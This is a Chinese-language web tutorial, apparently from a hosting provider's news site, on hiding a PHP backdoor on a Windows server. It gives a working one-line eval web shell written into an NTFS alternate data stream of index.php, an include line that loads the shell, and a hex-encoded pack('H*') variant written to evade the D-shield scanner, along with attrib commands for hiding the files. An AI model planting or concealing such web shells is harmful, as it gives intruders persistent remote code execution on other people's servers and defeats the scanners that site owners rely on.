溫馨提示×

溫馨提示×

您好，登錄后才能下訂單哦！

密碼登錄×

忘記密碼？

登錄注冊×

獲取短信驗證碼

其他方式登錄

點擊登錄注冊即表示同意《億速云用戶服務條款》

用戶登錄×

賬戶密碼登錄

請使用微信掃描上方二維碼

使用幫助

請求超時！

請點擊重新獲取二維碼

如何將php后門隱藏

發布時間：2020-07-24 16:17:57 來源：億速云閱讀：177 作者：Leah 欄目：編程語言

如何將php后門隱藏？很多新手對此不是很清楚，為了幫助大家解決這個難題，下面小編將為大家詳細講解，有這方面需求的人可以來學習下，希望你能有所收獲。

php將后門隱藏的方法：首先創建系統隱藏文件，并創建ADS隱藏文件；然后通過包含文件的方式來使用jpd；最后將【index.php:shell.jpg】hex編碼即可。

php將后門隱藏的方法：

一. attrib +s +h

創建系統隱藏文件。

attrib +s +a +r +h / attrib +s +h文件名

如何將php后門隱藏

查看隱藏文件

如何將php后門隱藏

二. 利用ADS隱藏文件

　　NTFS交換數據流（Alternate　Data　Streams，簡稱ADS）是NTFS磁盤格式的一個特性，在NTFS文件系統下，每個文件都可以存在多個數據流。通俗的理解，就是其它文件可以“寄宿”在某個文件身上，而在資源管理器中卻只能看到宿主文件，找不到寄宿文件。利用ADS數據流，我們可以做很多有趣的事情。(抄的)

1.首先創建ADS隱藏文件

在命令行，echo一個數據流進去，比如index文件是正常文件。

echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg

這樣就生成了一個不可見的 index.php:shell.jpg

如何將php后門隱藏

可用 dir/r命令來查看

如何將php后門隱藏

修改與刪除

修改:

進入文件所在目錄，notepad index.php:shell.jpg

如何將php后門隱藏

如何刪除index.php:shell.jpg呢？

直接刪除index.php

如何將php后門隱藏

2. 文件包含

我們生成了index.php:shell.jpg，可以通過包含文件的方式來使用。

<?php include(‘index.php:shell.jpg‘)?>

技術分享圖片

如何將php后門隱藏

還可以用上面學的隱藏include.php

如何將php后門隱藏

3. 免殺

隱藏了也不行兄dei，D盾一掃瞬間爆炸。

如何將php后門隱藏

把index.php:shell.jpg hex編碼

<?php 
$a="696E6465782E7068703A7368656C6C2E6A7067";
 // index.php:shell.jpg hex編碼
$b="a";
include(PACK(‘H*‘,$$b))
?>

如何將php后門隱藏

看完上述內容是否對您有幫助呢？如果還想對相關知識有進一步的了解或閱讀更多相關文章，請關注億速云行業資訊頻道，感謝您對億速云的支持。

向AI問一下細節

推薦閱讀：

免責聲明：本站發布的內容（圖片、視頻和文字）以原創、轉載和分享為主，文章觀點不代表本網站立場，如果涉及侵權請聯系站長郵箱：is@yisu.com進行舉報，并提供相關證據，一經查實，將立刻刪除涉嫌侵權內容。

上一篇新聞：
如何解決phpcms不支持script的問題
下一篇新聞：
怎么在phpcms中拿shell

猜你喜歡

AI
助
手

產品服務

地區劃分

專題活動

幫助支持

關于我們

售后咨詢

7*24小時在線電話：400-100-2938

7*24小時在線 QQ：800811969

關注億速云

億速云公眾號

手機網站二維碼

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女